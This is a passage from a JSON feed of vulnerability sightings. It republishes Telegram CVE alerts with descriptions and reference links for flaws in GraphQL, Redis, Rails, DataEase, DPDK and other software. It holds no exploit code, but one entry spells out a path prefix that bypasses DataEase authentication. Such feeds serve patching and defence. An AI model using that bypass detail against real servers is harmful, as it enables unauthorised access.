https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-01-13T09:11:16.000000Z"}, {"uuid": "81e5d49f-1059-454c-af2e-1a5f0a393343", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5XH2-23CC-5JC6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1035", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22151\n\ud83d\udd39 Description: Strawberry GraphQL is a library for creating GraphQL APIs. Starting in 0.182.0 and prior to version 0.257.0, a type confusion vulnerability exists in Strawberry GraphQL's relay integration that affects multiple ORM integrations (Django, SQLAlchemy, Pydantic). The vulnerability occurs when multiple GraphQL types are mapped to the same underlying model while using the relay node interface. When querying for a specific type using the global node field (e.g., FruitType:some-id), the resolver may incorrectly return an instance of a different type mapped to the same model (e.g., SpecialFruitType). This can lead to information disclosure if the alternate type exposes sensitive fields and potential privilege escalation if the alternate type contains data intended for restricted access. This vulnerability is fixed in 0.257.0.\n\ud83d\udccf Published: 2025-01-09T18:51:18.221Z\n\ud83d\udccf Modified: 2025-01-09T18:51:18.221Z\n\ud83d\udd17 References:\n1. https://github.com/strawberry-graphql/strawberry/security/advisories/GHSA-5xh2-23cc-5jc6\n2. https://github.com/strawberry-graphql/strawberry/commit/526eb82b70451c0e59d5a71ae9b7396f59974bd8", "creation_timestamp": "2025-01-09T19:22:02.000000Z"}, {"uuid": "ba6f191c-e480-41a9-9dc5-1409a5e24bff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C9CX-GHWR-X58M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1040", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33181\n\ud83d\udd39 Description: Xibo is a content management system (CMS). Starting in version 3.0.0 and prior to version 3.3.5, some API routes will print a stack trace when called with missing or invalid parameters revealing sensitive information about the locations of paths that the server is using. Users should upgrade to version 3.3.5, which fixes this issue. There are no known workarounds aside from upgrading.\n\ud83d\udccf Published: 2023-05-30T20:57:38.437Z\n\ud83d\udccf Modified: 2025-01-09T18:48:26.867Z\n\ud83d\udd17 References:\n1. https://github.com/xibosignage/xibo-cms/security/advisories/GHSA-c9cx-ghwr-x58m\n2. https://claroty.com/team82/disclosure-dashboard\n3. https://xibosignage.com/blog/security-advisory-2023-05/", "creation_timestamp": "2025-01-09T19:23:14.000000Z"}, {"uuid": "06a71da8-e01e-4c2a-9c8c-b714304062cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73X6-FQWW-X8RG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/729", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-51480\n\ud83d\udd39 Description: RedisTimeSeries is a time-series database (TSDB) module for Redis, by Redis. Executing one of these commands TS.QUERYINDEX, TS.MGET, TS.MRAGE, TS.MREVRANGE by an authenticated user, using specially crafted command arguments may cause an integer overflow, a subsequent heap overflow, and potentially lead to remote code execution. This vulnerability is fixed in 1.6.20, 1.8.15, 1.10.15, and 1.12.3.\n\ud83d\udccf Published: 2025-01-08T15:20:28.407Z\n\ud83d\udccf Modified: 2025-01-08T15:44:19.104Z\n\ud83d\udd17 References:\n1. https://github.com/RedisTimeSeries/RedisTimeSeries/security/advisories/GHSA-73x6-fqww-x8rg", "creation_timestamp": "2025-01-08T16:21:35.000000Z"}, {"uuid": "8a8ab04d-b517-4fca-af1c-7c29efa49af2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4G8V-VG43-WPGF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/867", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-28362\n\ud83d\udd39 Description: The redirect_to method in Rails allows provided values to contain characters which are not legal in an HTTP header value. This results in the potential for downstream services which enforce RFC compliance on HTTP response headers to remove the assigned Location header.\n\ud83d\udccf Published: 2025-01-09T00:33:47.730Z\n\ud83d\udccf Modified: 2025-01-09T00:33:47.730Z\n\ud83d\udd17 References:\n1. https://discuss.rubyonrails.org/t/cve-2023-28362-possible-xss-via-user-supplied-values-to-redirect-to/83132\n2. https://github.com/advisories/GHSA-4g8v-vg43-wpgf\n3. https://github.com/rails/rails/commit/1c3f93d1e90a3475f9ae2377ead25ccf11f71441\n4. https://github.com/rails/rails/commit/69e37c84e3f77d75566424c7d0015172d6a6fac5", "creation_timestamp": "2025-01-09T01:14:48.000000Z"}, {"uuid": "f5e87a76-f7e9-4d4f-a9c3-169d6372eb56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C6QG-CJJ8-47QP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/866", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-27539\n\ud83d\udd39 Description: There is a denial of service vulnerability in the header parsing component of Rack.\n\ud83d\udccf Published: 2025-01-09T00:33:47.737Z\n\ud83d\udccf Modified: 2025-01-09T00:33:47.737Z\n\ud83d\udd17 References:\n1. https://discuss.rubyonrails.org/t/cve-2023-27539-possible-denial-of-service-vulnerability-in-racks-header-parsing/82466\n2. https://github.com/advisories/GHSA-c6qg-cjj8-47qp\n3. https://github.com/rack/rack/commit/231ef369ad0b542575fb36c74fcfcfabcf6c530c\n4. https://github.com/rack/rack/commit/ee7919ea04303717858be1c3f16b406adc6d8cff\n5. https://lists.debian.org/debian-lts-announce/2023/04/msg00017.html\n6. https://security.netapp.com/advisory/ntap-20231208-0016/\n7. https://www.debian.org/security/2023/dsa-5530", "creation_timestamp": "2025-01-09T01:14:28.000000Z"}, {"uuid": "87c40b69-5dae-4fce-817a-2c323f83c77e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J34W-9XR4-M9P8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/762", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-34094\n\ud83d\udd39 Description: ChuanhuChatGPT is a graphical user interface for ChatGPT and many large language models. A vulnerability in versions 20230526 and prior allows unauthorized access to the config.json file of the privately deployed ChuanghuChatGPT project, when authentication is not configured. The attacker can exploit this vulnerability to steal the API keys in the configuration file. The vulnerability has been fixed in commit bfac445. As a workaround, setting up access authentication can help mitigate the vulnerability.\n\ud83d\udccf Published: 2023-06-02T15:19:45.596Z\n\ud83d\udccf Modified: 2025-01-08T17:57:02.918Z\n\ud83d\udd17 References:\n1. https://github.com/GaiZhenbiao/ChuanhuChatGPT/security/advisories/GHSA-j34w-9xr4-m9p8\n2. https://github.com/GaiZhenbiao/ChuanhuChatGPT/commit/bfac445e799c317b0f5e738ab394032a18de62eb", "creation_timestamp": "2025-01-08T18:18:00.000000Z"}, {"uuid": "61fbf419-2c0c-40e1-9b7f-8fe3c94db005", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GXH2-8JXP-M59H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/826", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-22143\n\ud83d\udd39 Description: WeGIA is a web manager for charitable institutions. A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the listar_permissoes.php endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts in the msg_e parameter. This vulnerability is fixed in 3.2.8.\n\ud83d\udccf Published: 2025-01-08T19:42:57.276Z\n\ud83d\udccf Modified: 2025-01-08T19:42:57.276Z\n\ud83d\udd17 References:\n1. https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-gxh2-8jxp-m59h", "creation_timestamp": "2025-01-08T20:14:52.000000Z"}, {"uuid": "ba5dd0d8-1105-4ac8-bfd4-ad89688fe1de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4960", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/1393", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-3727\n\ud83d\udd39 Description: A flaw was found in the github.com/containers/image library. This flaw allows attackers to trigger unexpected authenticated registry accesses on behalf of a victim user, causing resource exhaustion, local path traversal, and other attacks.\n\ud83d\udccf Published: 2024-05-09T14:57:21.327Z\n\ud83d\udccf Modified: 2025-01-13T20:48:50.544Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:0045\n2. https://access.redhat.com/errata/RHSA-2024:3718\n3. https://access.redhat.com/errata/RHSA-2024:4159\n4. https://access.redhat.com/errata/RHSA-2024:4613\n5. https://access.redhat.com/errata/RHSA-2024:4850\n6. https://access.redhat.com/errata/RHSA-2024:4960\n7. https://access.redhat.com/errata/RHSA-2024:5258\n8. https://access.redhat.com/errata/RHSA-2024:5951\n9. https://access.redhat.com/errata/RHSA-2024:6054\n10. https://access.redhat.com/errata/RHSA-2024:6708\n11. https://access.redhat.com/errata/RHSA-2024:6824\n12. https://access.redhat.com/errata/RHSA-2024:7164\n13. https://access.redhat.com/errata/RHSA-2024:7174\n14. https://access.redhat.com/errata/RHSA-2024:7182\n15. https://access.redhat.com/errata/RHSA-2024:7187\n16. https://access.redhat.com/errata/RHSA-2024:7922\n17. https://access.redhat.com/errata/RHSA-2024:7941\n18. https://access.redhat.com/errata/RHSA-2024:8260\n19. https://access.redhat.com/errata/RHSA-2024:8425\n20. https://access.redhat.com/errata/RHSA-2024:9097\n21. https://access.redhat.com/errata/RHSA-2024:9098\n22. https://access.redhat.com/errata/RHSA-2024:9102\n23. https://access.redhat.com/errata/RHSA-2024:9960\n24. https://access.redhat.com/security/cve/CVE-2024-3727\n25. https://bugzilla.redhat.com/show_bug.cgi?id=2274767", "creation_timestamp": "2025-01-13T21:12:01.000000Z"}, {"uuid": "3f731f22-5de5-4a0b-bb03-c1c631976764", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8M3W-MPHF-WXM8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1167", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33974\n\ud83d\udd39 Description: RIOT-OS, an operating system for Internet of Things (IoT) devices, contains a network stack with the ability to process 6LoWPAN frames. In versions 2023.01 and prior, an attacker can send multiple crafted frames to the device to trigger a race condition. The race condition invalidates assumptions about the program state and leads to an invalid memory access resulting in denial of service. This issue is patched in pull request 19679. There are no known workarounds.\n\ud83d\udccf Published: 2023-05-30T16:50:06.211Z\n\ud83d\udccf Modified: 2025-01-10T16:53:57.110Z\n\ud83d\udd17 References:\n1. https://github.com/RIOT-OS/RIOT/security/advisories/GHSA-8m3w-mphf-wxm8\n2. https://github.com/RIOT-OS/RIOT/pull/19679\n3. https://github.com/RIOT-OS/RIOT/commit/31c6191f6196f1a05c9765cffeadba868e3b0723\n4. https://github.com/RIOT-OS/RIOT/blob/f41b4b67b6affca0a8b32edced7f51088696869a/sys/net/gnrc/network_layer/sixlowpan/frag/sfr/gnrc_sixlowpan_frag_sfr.c#L1717\n5. https://github.com/RIOT-OS/RIOT/blob/f41b4b67b6affca0a8b32edced7f51088696869a/sys/net/gnrc/network_layer/sixlowpan/frag/sfr/gnrc_sixlowpan_frag_sfr.c#L509\n6. https://github.com/RIOT-OS/RIOT/blob/f41b4b67b6affca0a8b32edced7f51088696869a/sys/net/gnrc/network_layer/sixlowpan/frag/sfr/gnrc_sixlowpan_frag_sfr.c#L617\n7. https://github.com/RIOT-OS/RIOT/blob/master/sys/net/gnrc/network_layer/sixlowpan/frag/sfr/gnrc_sixlowpan_frag_sfr.c#L1586\n8. https://github.com/RIOT-OS/RIOT/blob/master/sys/net/gnrc/network_layer/sixlowpan/frag/sfr/gnrc_sixlowpan_frag_sfr.c#L404", "creation_timestamp": "2025-01-10T17:03:37.000000Z"}, {"uuid": "1e1a966d-448e-46e3-b5fe-3675d7ebda70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QFFQ-8GF8-MHQ7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1170", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-32699\n\ud83d\udd39 Description: MeterSphere is an open source continuous testing platform. Version 2.9.1 and prior are vulnerable to denial of service. \u200bThe `checkUserPassword` method is used to check whether the password provided by the user matches the password saved in the database, and the `CodingUtil.md5` method is used to encrypt the original password with MD5 to ensure that the password will not be saved in plain text when it is stored. If a user submits a very long password when logging in, the system will be forced to execute the long password MD5 encryption process, causing the server CPU and memory to be exhausted, thereby causing a denial of service attack on the server. This issue is fixed in version 2.10.0-lts with a maximum password length.\n\ud83d\udccf Published: 2023-05-30T18:59:26.174Z\n\ud83d\udccf Modified: 2025-01-10T16:51:37.440Z\n\ud83d\udd17 References:\n1. https://github.com/metersphere/metersphere/security/advisories/GHSA-qffq-8gf8-mhq7\n2. https://github.com/metersphere/metersphere/commit/c59e381d368990214813085a1a4877c5ef865411", "creation_timestamp": "2025-01-10T17:03:44.000000Z"}, {"uuid": "a7e85b8c-ea33-4b9d-8857-a0a006fe7958", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9F69-P73J-M73X", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1175", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-56511\n\ud83d\udd39 Description: DataEase is an open source data visualization analysis tool. Prior to 2.10.4, there is a flaw in the authentication in the io.dataease.auth.filter.TokenFilter class, which can be bypassed and cause the risk of unauthorized access. In the io.dataease.auth.filter.TokenFilter class, \u201drequest.getRequestURI\u201c is used to obtain the request URL, and it is passed to the \"WhitelistUtils.match\" method to determine whether the URL request is an interface that does not require authentication. The \"match\" method filters semicolons, but this is not enough. When users set \"server.servlet.context-path\" when deploying products, there is still a risk of being bypassed, which can be bypassed by any whitelist prefix /geo/../context-path/. The vulnerability has been fixed in v2.10.4.\n\ud83d\udccf Published: 2025-01-10T15:19:13.173Z\n\ud83d\udccf Modified: 2025-01-10T16:40:28.039Z\n\ud83d\udd17 References:\n1. https://github.com/dataease/dataease/security/advisories/GHSA-9f69-p73j-m73x", "creation_timestamp": "2025-01-10T17:04:01.000000Z"}, {"uuid": "99c33f1c-1766-43d6-aa0e-dffed20cbf32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0195", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/956", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-52337\n\ud83d\udd39 Description: A log spoofing flaw was found in the Tuned package due to improper sanitization of some API arguments. This flaw allows an attacker to pass a controlled sequence of characters; newlines can be inserted into the log. Instead of the 'evil' the attacker could mimic a valid TuneD log line and trick the administrator. The quotes '' are usually used in TuneD logs citing raw user input, so there will always be the ' character ending the spoofed input, and the administrator can easily overlook this. This logged string is later used in logging and in the output of utilities, for example, `tuned-adm get_instances` or other third-party programs that use Tuned's D-Bus interface for such operations.\n\ud83d\udccf Published: 2024-11-26T15:21:17.538Z\n\ud83d\udccf Modified: 2025-01-09T15:02:19.060Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:10381\n2. https://access.redhat.com/errata/RHSA-2024:10384\n3. https://access.redhat.com/errata/RHSA-2024:11161\n4. https://access.redhat.com/errata/RHSA-2025:0195\n5. https://access.redhat.com/security/cve/CVE-2024-52337\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2324541\n7. https://security.opensuse.org/2024/11/26/tuned-instance-create.html\n8. https://www.openwall.com/lists/oss-security/2024/11/28/1", "creation_timestamp": "2025-01-09T15:14:10.000000Z"}, {"uuid": "3d931a40-f996-4bbd-8857-34ff6e26ca61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0221", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/978", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-01-09T17:03:59.375Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0220\n5. https://access.redhat.com/errata/RHSA-2025:0221\n6. https://access.redhat.com/errata/RHSA-2025:0222\n7. https://access.redhat.com/security/cve/CVE-2024-11614\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-01-09T17:17:32.000000Z"}, {"uuid": "9e9fa988-6c00-4cac-8279-7d0fdeadc899", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0208", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/978", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-01-09T17:03:59.375Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0220\n5. https://access.redhat.com/errata/RHSA-2025:0221\n6. https://access.redhat.com/errata/RHSA-2025:0222\n7. https://access.redhat.com/security/cve/CVE-2024-11614\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-01-09T17:17:32.000000Z"}, {"uuid": "b5f53815-df0c-4c32-8d54-e05b6cd622ba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0220", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/978", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-01-09T17:03:59.375Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0220\n5. https://access.redhat.com/errata/RHSA-2025:0221\n6. https://access.redhat.com/errata/RHSA-2025:0222\n7. https://access.redhat.com/security/cve/CVE-2024-11614\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-01-09T17:17:32.000000Z"}, {"uuid": "b9449e6c-891b-4eff-ae4f-1540b909cf8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0209", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/978", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 2024-12-18T08:30:49.729Z\n\ud83d\udccf Modified: 2025-01-09T17:03:59.375Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:0208\n2. https://access.redhat.com/errata/RHSA-2025:0209\n3. https://access.redhat.com/errata/RHSA-2025:0210\n4. https://access.redhat.com/errata/RHSA-2025:0220\n5. https://access.redhat.com/errata/RHSA-2025:0221\n6. https://access.redhat.com/errata/RHSA-2025:0222\n7. https://access.redhat.com/security/cve/CVE-2024-11614\n8. https://bugzilla.redhat.com/show_bug.cgi?id=2327955", "creation_timestamp": "2025-01-09T17:17:32.000000Z"}, {"uuid": "9232730f-4339-448d-8301-b644c9add063", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QPX8-WQ6Q-R833", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/714", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-34097\n\ud83d\udd39 Description: hoppscotch is an open source API development ecosystem. In versions prior to 2023.4.5 the database password is exposed in the logs when showing the database connection string. Attackers with access to read system logs will be able to elevate privilege with full access to the database. Users are advised to upgrade. There are no known workarounds for this vulnerability. \n\ud83d\udccf Published: 2023-06-05T20:02:04.497Z\n\ud83d\udccf Modified: 2025-01-08T15:58:21.195Z\n\ud83d\udd17 References:\n1. https://github.com/hoppscotch/hoppscotch/security/advisories/GHSA-qpx8-wq6q-r833\n2. https://github.com/hoppscotch/hoppscotch/commit/15424903ede20b155d764abf4c4f7c2c84c11247", "creation_timestamp": "2025-01-08T16:16:05.000000Z"}, {"uuid": "170cb8e9-8315-4ca5-abbe-8ae9a0ad91a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9V8M-QV22-F268", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1577", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-23041\n\ud83d\udd39 Description: Umbraco.Forms is a web form framework written for the nuget ecosystem. Character limits configured by editors for short and long answer fields are validated only client-side, not server-side. This issue has been patched in versions 8.13.16, 10.5.7, 13.2.2, and 14.1.2. Users are advised to upgrade. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2025-01-14T18:54:45.430Z\n\ud83d\udccf Modified: 2025-01-14T18:54:45.430Z\n\ud83d\udd17 References:\n1. https://github.com/umbraco/Umbraco.Forms.Issues/security/advisories/GHSA-9v8m-qv22-f268", "creation_timestamp": "2025-01-14T19:10:25.000000Z"}, {"uuid": "86f89f12-0246-47f2-925c-94c41b064832", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VFRJ-FV6P-3CPF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/984", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2023-33965\n\ud83d\udd39 Description: Brook is a cross-platform programmable network tool. The `tproxy` server is vulnerable to a drive-by command injection. An attacker may fool a victim into visiting a malicious web page which will trigger requests to the local `tproxy` service leading to remote code execution. A patch is available in version 20230606.\n\ud83d\udccf Published: 2023-06-01T14:10:54.644Z\n\ud83d\udccf Modified: 2025-01-09T16:57:06.896Z\n\ud83d\udd17 References:\n1. https://github.com/txthinking/brook/security/advisories/GHSA-vfrj-fv6p-3cpf\n2. https://github.com/txthinking/brook/commit/314d7070c37babf6c38a0fe1eada872bb74bf03e", "creation_timestamp": "2025-01-09T17:18:49.000000Z"}, {"uuid": "29425273-535e-42aa-957a-6ac9e5e9f779", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:0210", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/978", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-11614\n\ud83d\udd39 Description: An out-of-bounds read vulnerability was found in DPDK's Vhost library checksum offload feature. This issue enables an untrusted or compromised guest to crash the hypervisor's vSwitch by forging Virtio descriptors to cause out-of-bounds reads. This flaw allows an attacker with a malicious VM using a virtio driver to cause the vhost-user side to crash by sending a packet with a Tx checksum offload request and an invalid csum_start offset.\n\ud83d\udccf Published: 